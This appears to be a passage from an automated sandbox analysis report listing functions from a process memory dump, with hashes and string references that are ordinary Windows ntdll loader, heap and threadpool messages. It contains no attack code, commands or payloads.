                                                                                                                      • Instruction Fuzzy Hash: 6331E6B16443069BC324EF2ADC85E2B77A5EFA4B14F05451DF9846B3B1EA30ED04C7A2
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 01422DF0: LdrInitializeThunk.NTDLL ref: 01422DFA
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420BA3
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420BB6
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420D60
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420D74
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1404860816-0
                                                                                                                      • Opcode ID: 90b6e56ba8b8973421a90932f49b6a6a8adcc357a2fd9c590d3eec2ae66e81d1
                                                                                                                      • Instruction ID: 2a67ff6a35fe7d9cd6c1b3e88b3124f5df8dc036c1760ea370a2f0f3ea0e7b1f
                                                                                                                      • Opcode Fuzzy Hash: 90b6e56ba8b8973421a90932f49b6a6a8adcc357a2fd9c590d3eec2ae66e81d1
                                                                                                                      • Instruction Fuzzy Hash: 96426A71900715DFDB61CF28C880BAAB7F5BF14314F4445AAE989EB352E770AA85CF60
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                      • API String ID: 0-379654539
                                                                                                                      • Opcode ID: cb7b0723c460d60fe8aa0fcda8fbc07c19c65abbdfc7d3beb0877dd5320d82d1
                                                                                                                      • Instruction ID: 60c8c88c279cfbef549636f148a37893c5990a5afa81a68ace76c8b40bd748ab
                                                                                                                      • Opcode Fuzzy Hash: cb7b0723c460d60fe8aa0fcda8fbc07c19c65abbdfc7d3beb0877dd5320d82d1
                                                                                                                      • Instruction Fuzzy Hash: FAC1AC75108396CFD711CF58C048B6ABBE8BF84708F04886EF9959B7A0E774C949CB56
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeProcess, xrefs: 01418422
                                                                                                                      • @, xrefs: 01418591
                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0141855E
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01418421
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1918872054
                                                                                                                      • Opcode ID: 1136e80d9ffa7ece02198a3d8605e28f41d0b64225403ef7d5a36a22445ba1e0
                                                                                                                      • Instruction ID: 1e3e778c139136626a2cfe84bdb622a1b2838acc01371714e430bcb507de2784
                                                                                                                      • Opcode Fuzzy Hash: 1136e80d9ffa7ece02198a3d8605e28f41d0b64225403ef7d5a36a22445ba1e0
                                                                                                                      • Instruction Fuzzy Hash: EE91AC71548346AFD721DF26CC80FABBBE8FB94644F40092FFA8896165E770D944CB62
                                                                                                                      Strings
                                                                                                                      • .Local, xrefs: 014128D8
                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014521D9, 014522B1
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014522B6
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 014521DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                      • API String ID: 0-1239276146
                                                                                                                      • Opcode ID: 516a89a703954804b8e052c2aef2864570b707dc7cc752045250b4bddf85ec1f
                                                                                                                      • Instruction ID: e0e4840cd4b8eb2ae1a8e17d74cf36090f7b71063d9f428e17db3e5e54e02725
                                                                                                                      • Opcode Fuzzy Hash: 516a89a703954804b8e052c2aef2864570b707dc7cc752045250b4bddf85ec1f
                                                                                                                      • Instruction Fuzzy Hash: B7A1AF35A00229DBDB24CF58D884BAAB7B1BF58354F2401EBE908E7365D7709E81CF80
                                                                                                                      Strings
                                                                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01453437
                                                                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01453456
                                                                                                                      • RtlDeactivateActivationContext, xrefs: 01453425, 01453432, 01453451
                                                                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0145342A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                      • API String ID: 0-1245972979
                                                                                                                      Strings
                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0144106B
                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01441028
                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014410AE
                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01440FE5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                      • API String ID: 0-1468400865
                                                                                                                      Strings
                                                                                                                      • apphelp.dll, xrefs: 01402462
                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0144A992
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0144A9A2
                                                                                                                      • LdrpDynamicShimModule, xrefs: 0144A998
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-176724104
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 013F3264
                                                                                                                      • HEAP[%wZ]: , xrefs: 013F3255
                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013F327D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                      • API String ID: 0-617086771
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-4253913091
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $@
                                                                                                                      • API String ID: 0-1077428164
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      • API String ID: 0-2779062949
                                                                                                                      Strings
                                                                                                                      • LdrpCheckModule, xrefs: 0144A117
                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0144A10F
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0144A121
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-161242083
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-1334570610
                                                                                                                      Strings
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 014582D7
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 014582E8
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 014582DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1783798831
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0149C1F1
                                                                                                                      • PreferredUILanguages, xrefs: 0149C212
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0149C1C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      • API String ID: 0-2968386058
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      • API String ID: 0-1373925480
                                                                                                                      Strings
                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01464888
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01464899
                                                                                                                      • LdrpCheckRedirection, xrefs: 0146488F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-3154609507
                                                                                                                      • Opcode ID: 4d275aa3f16aef72eb42c641ed67fd63dfe75813fea9153894f70e75700217c0
                                                                                                                      • Instruction ID: c3dcae3cfa6cc91b09825aed295552ca37a38f38fb1539b251e32954fff8056a
                                                                                                                      • Opcode Fuzzy Hash: 4d275aa3f16aef72eb42c641ed67fd63dfe75813fea9153894f70e75700217c0
                                                                                                                      • Instruction Fuzzy Hash: 2C41D236A053518BCF21CE69D940A27BBE8EF89A58B0A015FED48D7371D730D800CB82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-2558761708
                                                                                                                      • Opcode ID: 60b8af5594a4d52e192dbd3632246c13ab0103cbbaf6ecbc0e599034b0a62568
                                                                                                                      • Instruction ID: c8ddfa70f7d0f250a843ee9f372b5c8d75a3590d4ea61de9a73d09e97c50cdb9
                                                                                                                      • Opcode Fuzzy Hash: 60b8af5594a4d52e192dbd3632246c13ab0103cbbaf6ecbc0e599034b0a62568
                                                                                                                      • Instruction Fuzzy Hash: 7211CD313161469FEB2DCA1CD481B7AB3A6AF5161EF19816EF506CF662DB30DC41C750
                                                                                                                      Strings
                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 014620F3
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01462104
                                                                                                                      • LdrpInitializationFailure, xrefs: 014620FA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2986994758
                                                                                                                      • Opcode ID: 9fd41679647e482accd3f98194177fafc7c5f20d3d427b1c9106f140138fbed2
                                                                                                                      • Instruction ID: 636ab37616e731a610ce24de9347a34e3fd94ddbe66f5d612666fbb7c58c2d24
                                                                                                                      • Opcode Fuzzy Hash: 9fd41679647e482accd3f98194177fafc7c5f20d3d427b1c9106f140138fbed2
                                                                                                                      • Instruction Fuzzy Hash: C5F0F475640308BBEB24EA4D8C46FD63B6CEB40F08F50001EFA0077392D2F0A9008B82
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: #%u
                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                      • Opcode ID: 6f28c6b001b6683dd7cb1b5969eb7e45ff33846ce7c64e19c2a5df1d475c402f
                                                                                                                      • Instruction ID: fd138fb6bafe1a40d535d266e894718ed8ea71520053a9be196d735c6c709a9a
                                                                                                                      • Opcode Fuzzy Hash: 6f28c6b001b6683dd7cb1b5969eb7e45ff33846ce7c64e19c2a5df1d475c402f
                                                                                                                      • Instruction Fuzzy Hash: 6D716FB1A0010A9FDB05DF99C980FAEB7F8FF18304F15406AEA05E7261EA34ED41CB61
                                                                                                                      Strings
                                                                                                                      • LdrResSearchResource Enter, xrefs: 013EAA13
                                                                                                                      • LdrResSearchResource Exit, xrefs: 013EAA25
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                      • API String ID: 0-4066393604
                                                                                                                      • Opcode ID: c468aa01699ee5dd887906f8a2aa8ecfec7edae61a59dfbedc322983fdf891a6
                                                                                                                      • Instruction ID: 6d68fe987aa974c89959561fd462d892d29e29509f7a1a1d613f122deb914516
                                                                                                                      • Opcode Fuzzy Hash: c468aa01699ee5dd887906f8a2aa8ecfec7edae61a59dfbedc322983fdf891a6
                                                                                                                      • Instruction Fuzzy Hash: 41E19271E003299BFF22CF99D984BAEBBB9BF14718F10452AF901E72A1D7749941CB50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-197956300
                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction ID: a64ad2f6cfb048cd346a8799b229f5b815f74a7c47b831117f1e9da3c8e9aa85
                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction Fuzzy Hash: 5FC1E2312043429BE725CF29C840B6BBBE5EFE4318F694A2EF696CB2A0D774D505CB41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                      • Opcode ID: e227bf3ae95a7fb0df9c2f455c88079d9447da53128799f18be9983742604d93
                                                                                                                      • Instruction ID: 392c60cc5833d20711cd87bdff0403a8dc5e9b71ad376eb1bb683e1447f50c12
                                                                                                                      • Opcode Fuzzy Hash: e227bf3ae95a7fb0df9c2f455c88079d9447da53128799f18be9983742604d93
                                                                                                                      • Instruction Fuzzy Hash: 35619D71E002199FDB54DFA9C940BAEFBB5FB48704F14406EEA49EB262D730EA40CB50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$MUI
                                                                                                                      • API String ID: 0-17815947
                                                                                                                      • Opcode ID: 260cb34b48e61c348b46a7fff3794bb9a1416d60940997c4d298dd770efb1c7e
                                                                                                                      • Instruction ID: 7a0a4806a419065f23d6522021f0000343a0014651391f44edffea0448123d41
                                                                                                                      • Opcode Fuzzy Hash: 260cb34b48e61c348b46a7fff3794bb9a1416d60940997c4d298dd770efb1c7e
                                                                                                                      • Instruction Fuzzy Hash: EB512771E0021EAEDF11DFA9CC90FEFBBB8EB54754F14052AE611B72A0D6709A45CB60
                                                                                                                      Strings
                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013E063D
                                                                                                                      • kLsE, xrefs: 013E0540
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                      • API String ID: 0-2547482624
                                                                                                                      • Opcode ID: 492cf5a99d954a6092e3eeb30311b7920b4d19f20dc937ae08e32cc13e4244d7
                                                                                                                      • Instruction ID: 231aab6f72b1b5075cf2f366037056cd3b114706bfb1128eb7454a10a8ec2fb0
                                                                                                                      • Opcode Fuzzy Hash: 492cf5a99d954a6092e3eeb30311b7920b4d19f20dc937ae08e32cc13e4244d7
                                                                                                                      • Instruction Fuzzy Hash: DB51AE716047529BD728EF69C4887A7BBE4EF84318F10483EE6E987281E7B09545CF91
                                                                                                                      Strings
                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 013EA309
                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 013EA2FB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                      • API String ID: 0-2876891731
                                                                                                                      • Opcode ID: b2492b55898feb2f173159e4a083c069c4f362c9330b822fa0cd8dc8e03f406f
                                                                                                                      • Instruction ID: ca337ab19634bb4e1bf37b1e4ae40abee626b0dd1db00ac38bcae234ccbc5204
                                                                                                                      • Opcode Fuzzy Hash: b2492b55898feb2f173159e4a083c069c4f362c9330b822fa0cd8dc8e03f406f
                                                                                                                      • Instruction Fuzzy Hash: 7441CD30A047A9DBEB12CF59D844B6ABBF4FF84308F1440AAE914DB7A1E3B5D900CB50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                      • Opcode ID: b9bd335ad3ce1b411fcf77db3e8813895958806ad912bb4c18730fdd16c53b5b
                                                                                                                      • Instruction ID: fd9cbd4472f209282979bc51b473b36e01b569b495c4b66ff8a926f9292e6185
                                                                                                                      • Opcode Fuzzy Hash: b9bd335ad3ce1b411fcf77db3e8813895958806ad912bb4c18730fdd16c53b5b
                                                                                                                      • Instruction Fuzzy Hash: 3A01D1B2255740AFD311DF14CD45F2677E8E794729F05893AE68CC75A4E374E804CB46
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MUI
                                                                                                                      • API String ID: 0-1339004836
                                                                                                                      • Opcode ID: 6daae28c16a667c2101e22de489122f25eae53b571436b80826050bf9f654de3
                                                                                                                      • Instruction ID: 6a4abb3e69e7b4b3937d0e8f692cbe4421b68f9ce955e1c2f8b94263657723dd
                                                                                                                      • Opcode Fuzzy Hash: 6daae28c16a667c2101e22de489122f25eae53b571436b80826050bf9f654de3
                                                                                                                      • Instruction Fuzzy Hash: 30825B75E003298BEB25CFA9C988BEDBBF5BF44318F148169E919AB291D7309D41CF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      • Opcode ID: 776e58bd0055b033d3b3b362a1d0960cf8d55edd9d9005ac84948fd27f9fb8ba
                                                                                                                      • Instruction ID: b82708a91ed9b2d652c57953e8c4feba97e1969c7ad537626e927f14f6191819
                                                                                                                      • Opcode Fuzzy Hash: 776e58bd0055b033d3b3b362a1d0960cf8d55edd9d9005ac84948fd27f9fb8ba
                                                                                                                      • Instruction Fuzzy Hash: 14918671900219AFEB21DF95DD45FAFBBB8EF14754F11402AF604AB1A0D775AD00CB51
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: a2ba62f5085df04d5dd2df7aa0e51b15c83ada05848d2c15d03fcdc34e45f4ec
• Instruction ID: 1d701c4ab82877bbda6341a5100698b95f7f52c444b362be52463a74449069c5
• Opcode Fuzzy Hash: a2ba62f5085df04d5dd2df7aa0e51b15c83ada05848d2c15d03fcdc34e45f4ec
• Instruction Fuzzy Hash: E291BF3190061ABEDB22AFA5DC44FEFBBB9EF55740F10002AF605A7260DB749942CB90
Strings
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID:
• String ID: GlobalTags
• API String ID: 0-1106856819
• Opcode ID: faddba1d350a1077fa91d147e531531b967e27bdf0c2e35babeeea05811bb4fc
